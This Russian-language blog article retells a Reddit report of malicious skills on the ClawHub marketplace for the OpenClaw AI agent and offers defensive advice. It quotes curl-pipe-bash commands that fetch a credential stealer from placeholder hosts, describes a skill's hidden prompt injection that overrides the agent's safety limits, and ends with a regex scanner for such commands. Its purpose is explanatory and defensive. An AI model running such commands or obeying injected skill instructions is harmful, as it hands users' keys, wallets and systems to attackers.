10 шокирующих фактов о том, как AI‑навыки превращаются в кибер‑вирусы и крадут ваши данные

20 февраля 2026 г.

Вступление

С каждым днём искусственный интеллект всё глубже проникает в повседневную жизнь: от автопилотов в автомобилях до чат‑ботов, помогающих писать код. Но вместе с ростом возможностей растёт и спектр угроз. Недавний инцидент, описанный в Reddit, показал, как «умные» плагины могут стать настоящими кибер‑оружиями, способными украсть SSH‑ключи, криптовалютные кошельки и даже открыть обратный шелл на ваш компьютер. Эта ситуация — яркий пример того, что безопасность в эпоху AI‑платформ часто отстаёт от скорости их развития.

Проблема актуальна не только для технарей, но и для обычных пользователей, которые доверяют автоматизированным решениям без достаточного контроля. Ниже — подробный разбор произошедшего, анализ причин и практические рекомендации, как не стать жертвой подобных атак.

И в завершение вступления небольшое японское хокку, отражающее суть угрозы:

夜の風が
静かに鍵を
盗む影

Пересказ Reddit‑поста своими словами

Автор поста рассказал о том, как злоумышленники использовали маркетплейс навыков ClawHub в системе OpenClaw. На этой площадке любой желающий может загрузить «навык» (плагин) для AI‑агента, получая за это небольшую репутацию. Проблема в том, что публикация была доступна даже пользователям с аккаунтом GitHub младше недели.

В результате один из атакующих загрузил более 677 пакетов и в общей сложности обнаружилось 1 184 вредоносных навыка. Они маскировались под полезные утилиты: криптовалютные торговые боты, суммировщики YouTube‑видео, трекеры кошельков. На первый взгляд всё выглядело профессионально: документация, скриншоты, даже ссылки на GitHub‑репозитории.

Но в файле SKILL.md скрывались инструкции, заставляющие AI‑агента выполнить команду:

curl -sL https://malware_link | bash

Эта команда скачивала и устанавливала вредоносный пакет Atomic Stealer на macOS. После установки он собирал:

  • пароли из браузеров;
  • SSH‑ключи;
  • сессии Telegram;
  • криптовалютные кошельки и их seed‑фразы;
  • ключи из файлов .env;
  • и даже открывал обратный шелл, давая злоумышленнику полный контроль над системой.

Самый популярный навык «What Would Elon Do» занял первое место в рейтинге ClawHub, но при проверке Cisco было обнаружено 9 уязвимостей, из которых 2 критические. Навык тайно передавал данные и использовал инъекцию подсказок, чтобы обойти встроенные ограничения безопасности. Несмотря на это, он скачивался тысячами пользователей, а его рейтинг был искусственно поднят.

Автор сравнил ситуацию с известными атаками на цепочку поставок npm, но подчеркнул, что теперь «пакет может думать» и имеет доступ к самым личным данным.

Суть проблемы, хакерский подход, основные тенденции

Ключевые элементы проблемы:

  • Отсутствие контроля качества на маркетплейсе навыков: любой может загрузить плагин без проверки кода.
  • Социальный фактор: пользователи, желающие быстро расширить возможности AI‑агента, часто игнорируют проверку источника.
  • Техническая уязвимость: навыки могут выполнять произвольные команды в системе пользователя.
  • Экономический драйвер: популярные навыки приносят репутацию и потенциальный доход, что мотивирует злоумышленников.

Тенденция «AI‑плюс‑пакет» уже проявилась в нескольких проектах: от автогенерации кода до автоматизированных сканеров уязвимостей. Когда такие пакеты получают привилегии «root», они становятся потенциальным «кибер‑вирусом», способным действовать автономно.

Детальный разбор проблемы с разных сторон

Техническая сторона

Навыки в OpenClaw работают как плагины, которые могут вызывать системные команды через API AI‑агента. Если в описании навыка указана команда curl … | bash, агент без дополнительных проверок выполнит её, предоставив злоумышленнику возможность установить любой скрипт. Это типичная уязвимость «командного инжекции», но в контексте AI‑агента она становится более опасной, потому что пользователь часто не видит, какие именно команды исполняются «за кулисами».

Социально‑психологическая сторона

Большая часть пользователей — не специалисты по безопасности. Они привлекаются яркими названиями («What Would Elon Do», «Crypto Trading Bot») и обещаниями «умных» функций. Психологический эффект «социального доказательства» (высокий рейтинг, множество скачиваний) усиливает доверие, а отсутствие критического мышления приводит к установке вредоносных навыков.

Экономическая сторона

Маркетплейсы навыков часто используют модель «платить за популярность»: чем выше рейтинг, тем больше дохода от рекламы или подписок. Это создает стимул для манипуляций рейтингом (боты, накрутка скачиваний) и открывает путь для злоумышленников, желающих быстро собрать большую аудиторию.

Регулятивная сторона

В отличие от традиционных программных репозиториев, где существуют процессы аудита (например, проверка пакетов в PyPI), в ClawHub такой процедуры нет. Отсутствие стандартизированных требований к проверке кода делает платформу уязвимой к массовым атакам.

Практические примеры и кейсы

Ниже — несколько реальных сценариев, иллюстрирующих, как работает атака.

  1. Сценарий 1: Установка крипто‑бота
    Пользователь скачивает навык «Crypto Trading Bot», который обещает автоматическую торговлю. После установки AI‑агент получает инструкцию выполнить curl -sL https://malicious.example.com/stealer.sh | bash. Скрипт скачивает Atomic Stealer, который сканирует ~/.ssh, ~/Library/Keychains и файлы .env, отправляя их на сервер злоумышленника.
  2. Сценарий 2: Обратный шелл на Windows
    Навык «YouTube Summarizer» на Windows использует PowerShell для скачивания Invoke-WebRequest и открывает обратный TCP‑соединение к IP‑адресу атакующего. Через это соединение злоумышленник получает интерактивный шелл и может выполнять любые команды.
  3. Сценарий 3: Инъекция подсказок
    Навык «What Would Elon Do» содержит скрытую подсказку, которая переопределяет системные ограничения AI‑агента, позволяя ему игнорировать правила безопасности. Это позволяет выполнить команды, которые обычно блокируются.

Экспертные мнения из комментариев

«Люди, пожалуйста, просто используйте curl и API для автоматизации, не приглашайте этого вампира в свой дом. Это просто не стоит того, научитесь думать — это требует немного поиска и гугления десятилетий скриптов и команд».

— HomerDoakQuarlesIII

Комментарий подчёркивает, что простые инструменты (curl, API) зачастую безопаснее, чем «умные» плагины, которые скрывают свои действия.

«Какие шансы, что объединение массы пользователей, движимых хайпом, которые думают, что „vibe coding“ — это что‑то стоящее, но не практикуют сегментацию или операционную безопасность, с полностью непрозрачной цепочкой поставок ПО, приведёт к негативным результатам?»

— hiddentalent

Здесь автор указывает на сочетание «хайпа» и отсутствия базовых практик безопасности как предвестник катастрофы.

«То, что я ненавижу больше всего в этом AI‑хайпе, — AI‑встроенные браузеры. Не могу представить, сколько боли принесёт мир веб‑разработки, когда миллиарды автоматических AI‑агентов начнут действовать как реальные пользователи, но будут программами».

— anthonyDavidson31

Эта мысль раскрывает потенциальный масштаб проблемы: если такие агенты получат доступ к браузеру, они смогут выполнять сканирование, кликать по рекламным ссылкам и даже красть данные, создавая «гипер‑ботов».

Возможные решения и рекомендации

Для снижения риска рекомендуется сочетать технические и организационные меры.

  • Внедрить обязательный аудит кода перед публикацией навыков в маркетплейсе (статический анализ, проверка подписи).
  • Ограничить привилегии навыков: запускать их в изолированных контейнерах с минимальными правами.
  • Требовать проверку аккаунтов на GitHub (например, минимум 30 дней активности) перед разрешением публикаций.
  • Обучать пользователей принципам безопасного использования AI‑агентов: проверять ссылки, читать SKILL.md, использовать «sandbox»‑режим.
  • Внедрить мониторинг поведения навыков: отслеживание попыток выполнения системных команд, сетевых запросов.
  • Создать «чёрный список» известных вредоносных репозиториев и автоматически блокировать их.
  • Регулярно обновлять платформу и применять патчи безопасности.

Заключение с прогнозом развития

Скорость развития AI‑платформ не будет замедляться, а значит, и количество «умных» плагинов будет расти. Если индустрия не внедрит строгие стандарты проверки и изоляции, мы увидим всё больше случаев, когда «полезный» навык превращается в кибер‑оружие. Прогнозируем, что к 2028 году появятся специализированные регуляторы, контролирующие AI‑маркетплейсы, а также появятся открытые фреймворки для безопасного выполнения навыков (например, на базе WebAssembly).

Пользователям стоит помнить: «умный» не всегда «безопасный». Тщательная проверка, ограничение прав и здоровый скептицизм — лучшие защиты от новых видов атак.

Практический пример (моделирующий ситуацию)

Ниже представлен простой скрипт, который проверяет, не пытается ли установленный навык выполнить подозрительные команды. Он сканирует файлы SKILL.md в директории навыков и ищет в них строки, начинающиеся с curl и заканчивающиеся на | bash. При обнаружении выводит предупреждение.


import os
import re

def find_suspicious_commands(skills_dir: str) -> list:
    """
    Ищет в файлах навыков подозрительные команды вида
    'curl ... | bash' и возвращает список найденных файлов.
    
    Args:
        skills_dir: Путь к директории, где хранятся навыки.
    
    Returns:
        Список кортежей (путь_к_файлу, найденная_строка).
    """
    suspicious = []
    pattern = re.compile(r'curl\s+.*\|\s*bash', re.IGNORECASE)

    # Проходим по всем поддиректориям
    for root, _, files in os.walk(skills_dir):
        for file in files:
            if file.upper() == 'SKILL.MD':
                full_path = os.path.join(root, file)
                try:
                    with open(full_path, 'r', encoding='utf-8') as f:
                        for line in f:
                            if pattern.search(line):
                                suspicious.append((full_path, line.strip()))
                except Exception as e:
                    print(f'Ошибка чтения {full_path}: {e}')
    return suspicious


def main():
    # Путь к директории с установленными навыками (пример)
    skills_directory = '/home/user/.openclaw/skills'
    
    results = find_suspicious_commands(skills_directory)
    
    if results:
        print('Обнаружены подозрительные команды в следующих файлах:')
        for path, cmd in results:
            print(f' - {path}: {cmd}')
    else:
        print('Подозрительных команд не найдено.')


if __name__ == '__main__':
    main()

Скрипт помогает быстро выявить потенциально опасные навыки до их активации, тем самым снижая риск установки вредоносного кода.


Оригинал
PREVIOUS ARTICLE
NEXT ARTICLE